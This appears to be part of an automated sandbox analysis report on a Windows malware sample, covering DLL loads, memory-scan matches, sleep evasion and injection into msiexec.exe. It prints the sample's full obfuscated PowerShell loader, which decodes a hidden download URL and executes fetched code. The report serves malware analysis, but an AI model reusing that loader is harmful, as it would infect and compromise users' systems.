              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rstrtmgr.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1599797657.0000000007B6C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1246016018.00000232AF2D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1244087582.00000232AF0D1000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: ShellExecute("powershell", "";$Ndhjlps='Kontinentalsokkel';;$Klaube", "", "", "0");
              Source: Yara match | File source: 0000000A.00000002.1612779996.000000000971E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1610779678.0000000008EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000A.00000002.1593326524.000000000616F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.1384945897.0000029110071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Yndlingsoffer)$GLOBAl:TalNETTeNE = [sYStEm.teXt.enCoDInG]::AScII.gEtsTrInG($EKsporTVrdI)$gLobAl:TrAMPAgE=$tALNETtenE.SubSTRIng($rAdiaTory,$HuppaHs176)<#Tillberes Patronymikaenes Euph
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Unkneaded $Dschubba $Anticommutative), (Stats @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Volplaning71 = [AppDomain]::CurrentDomain.GetAssemblies()$glo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Felttyper)), $Predbjrn).DefineDynamicModule($Skraldgriner, $false).DefineType($Sekslberne, $Hostageship, [System.MulticastDelegate])$F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Yndlingsoffer)$GLOBAl:TalNETTeNE = [sYStEm.teXt.enCoDInG]::AScII.gEtsTrInG($EKsporTVrdI)$gLobAl:TrAMPAgE=$tALNETtenE.SubSTRIng($rAdiaTory,$HuppaHs176)<#Tillberes Patronymikaenes Euph
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC480942 push E95B2DD0h; ret 2_2_00007FFAAC4809C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAAC483332 push eax; retf 2_2_00007FFAAC483341
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07CF06E4 push es; iretd 10_2_07CF06EE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07CF5698 push esi; iretd 10_2_07CF56A6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07CF0648 push es; iretd 10_2_07CF0656
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07CF4E48 push eax; iretd 10_2_07CF500E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07CF5640 push esi; iretd 10_2_07CF564E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_07CF5020 push ecx; iretd 10_2_07CF51CE
              Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4992
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4889
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6827
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2984
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1028 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7564 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920 Thread sleep count: 1877 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920 Thread sleep time: -5631000s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920 Thread sleep count: 8114 > 30
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 7920 Thread sleep time: -24342000s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.1393678226.000002916ABC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt %SystemRoot%\system32\mswsock.dllE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uAe.enSta kHiggtSliseLoyktImmusBatz. hawHBargeBefr(
              Source: msiexec.exe, 0000000D.00000002.2546894323.000000000698A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
              Source: msiexec.exe, 0000000D.00000002.2546894323.00000000069E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match File source: amsi64_2356.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 2356, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7452, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3A80000
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Ndhjlps='Kontinentalsokkel';;$Klauber101='Catadioptrical';;$Marksmen='Kalfaktorens';;$Unlivableness='Limewort';;$Proctoplastic=$host.Name; function Exposes($Kataloger){If ($Proctoplastic) {$Cognacagtigeres='Corollaceous';$Unintelligently103=4;$credoerne=$Unintelligently103}do{$Defeats+=$Kataloger[$credoerne];$credoerne+=5} until(!$Kataloger[$credoerne])$Defeats}function Nonprecipitation225($Civvy){ .($hesperornithid) ($Civvy)}$Underekstremiteten=Exposes 'Le.iNKompESubtt C.e.Depow';$Underekstremiteten+=Exposes 'broneAn eb s mCUntolWaleiSidsefotoNOv rT';$Chemotherapy=Exposes 'NondMTresoEarlzOocyi indlFriglT etakom /';$Valsk=Exposes ' PreTEme lStubsTrag1 tim2';$Gevandterne='E fa[ HulnBraiE G dT V b.DilaSS ereEndarUnruv .reIbeboC fsaETermPSygeO BroiPiroNDuodtBareM CocAWr tN ,ona M.lGAlabea terHols]Augm:Aftv:RigssDekaEN ffCUltrU,tomROut i SmytD ngyMercPDomerU.efOAtriTf,glORaadcNe,roBeyol Fej=Batt$ flav TotARan LSvrls,jreK';$Chemotherapy+=Exposes 'Ca o5 A,b.Sk b0 Xen I,te(DingWelskiRequnDrifdudmaoTmniwGrnssO,by ,oflNBur.TZone Camo1Spur0R ln.Groi0.nth;Sfi actoWBu diHaywnF,rv6G,ni4Skat; G,e ParaxGudf6K.us4A st; opr dionrMic vOmt :F,id1Stor3Nykk1Reca.,prn0Dela) Cen OutG Ap eSrskcDotik NicoA,ou/Ball2Brag0 For1 Leu0Tims0Band1 Sy 0Mamm1Cond PsaFDyreiAndrrEnsleHincfSan o bemxAnal/Myos1Soci3Kalo1Bavl.Derm0';$Erhvervssygdommene=Exposes 'MargUA foSTumieImpornani- DogAImplGFluoE KolnPu.pt';$Ridableness=Exposes 'Miljh Shit nultRubbp vasergs:L.dg/Voci/OutroCutlfWall1Hgt xRedi.CafiiRepocglobuf,ng/Ydrert lbx SerHB llERo kjLin EAn kYPimpEUnde/ChifNDepri D.kc entkUnive Gy.lKri i OveztermaLykktIndbiFusioEtikn Lep.K.nfcKrels No.v';$Samariteruddannelse=Exposes 'Nids>';$hesperornithid=Exposes ' ineIStrue oncx';$Arbejdstilbud216='Delelejligheds';$Stenvindenes49='\huguenotism.Bed';Nonprecipitation225 
(Exposes ' Sac$BikagBondlThe O,onoB mpea belLupsl:IleomThomoletmDSubfEev lNFunkHArkie nrDI peESeksROrd NBolseUmedST,as= Kl.$ InkerefrnDeutvd hy:lollATa nP utPl ddDAdelaFod Tb tuaP,ja+Plag$mokeSAdretPr aEnvernHoveVInfri SanNChacdKroeE CooN KameNon Sconc4 Cap9');Nonprecipitation225 (Exposes 'Non $ TecGRentlKuldonondBBe aaFiskL Und:Ko,en oesa.orhRFi ucSmudODepaS HydIM loSIlio=Hove$CrosR opnISupeDTilsaTereB NonlIde e M snForseKanaSInkusTra .dic,sbolip nefLHemaIRifft Ou ( V r$FaldS Coha VarmPrivaOutwrAnneiSto T Apteh,emrmoruUCystD ildBilbA MonNTinsNK.atELoseLMed sClime Rip)');Nonprecipitation225 (Exposes $Gevandterne);$Ridableness=$Narcosis[0];$fike=(Exposes ' Hom$GangGDiscLGensoS ngB MagAEth l.ord:StroTPerivraadINovis Fort.ikrERoerPDipoUDavinIrreKCaritBambE,pitTUng sAden=Encyn ChaEafbeWSkaa-DrifO manBSub.jBredEBaylCK,tttnone TessByggyR glsChaut LeveFdsemSoci.Real$ForsUTidsnInd DVlteE CulRT,laeMillkDiscsIndst BssrUltiEGinnmSmalI,orvtRecae .ilTBesvELiniN');Nonprecipitation225 ($fike);Nonprecipitation225 (Exposes ' F r$R.ilT,eskv Arti RossSp ntO eredonopinf,uJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$ndhjlps='kontinentalsokkel';;$klauber101='catadioptrical';;$marksmen='kalfaktorens';;$unlivableness='limewort';;$proctoplastic=$host.name; function exposes($kataloger){if ($proctoplastic) {$cognacagtigeres='corollaceous';$unintelligently103=4;$credoerne=$unintelligently103}do{$defeats+=$kataloger[$credoerne];$credoerne+=5} until(!$kataloger[$credoerne])$defeats}function nonprecipitation225($civvy){ .($hesperornithid) ($civvy)}$underekstremiteten=exposes 'le.inkompesubtt c.e.depow';$underekstremiteten+=exposes 'bronean eb s mcuntolwaleisidsefotonov rt';$chemotherapy=exposes 'nondmtresoearlzoocyi indlfriglt etakom /';$valsk=exposes ' preteme lstubstrag1 tim2';$gevandterne='e fa[ hulnbraie g dt v b.dilass ereendarunruv .reibeboc fsaetermpsygeo broipironduodtbarem cocawr tn ,ona m.lgalabea terhols]augm:aftv:rigssdekaen ffcultru,tomrout i smytd ngymercpdomeru.efoatritf,gloraadcne,robeyol fej=batt$ flav totaran lsvrls,jrek';$chemotherapy+=exposes 'ca o5 a,b.sk b0 xen i,te(dingwelskirequndrifdudmaotmniwgrnsso,by ,oflnbur.tzone camo1spur0r ln.groi0.nth;sfi actowbu dihaywnf,rv6g,ni4skat; g,e paraxgudf6k.us4a st; opr dionrmic vomt :f,id1stor3nykk1reca.,prn0dela) cen outg ap esrskcdotik nicoa,ou/ball2brag0 for1 leu0tims0band1 sy 0mamm1cond psafdyreiandrrenslehincfsan o bemxanal/myos1soci3kalo1bavl.derm0';$erhvervssygdommene=exposes 'margua fostumieimpornani- dogaimplgfluoe kolnpu.pt';$ridableness=exposes 'miljh shit nultrubbp vasergs:l.dg/voci/outrocutlfwall1hgt xredi.cafiirepocglobuf,ng/ydrert lbx serhb llero kjlin ean kypimpeunde/chifndepri d.kc 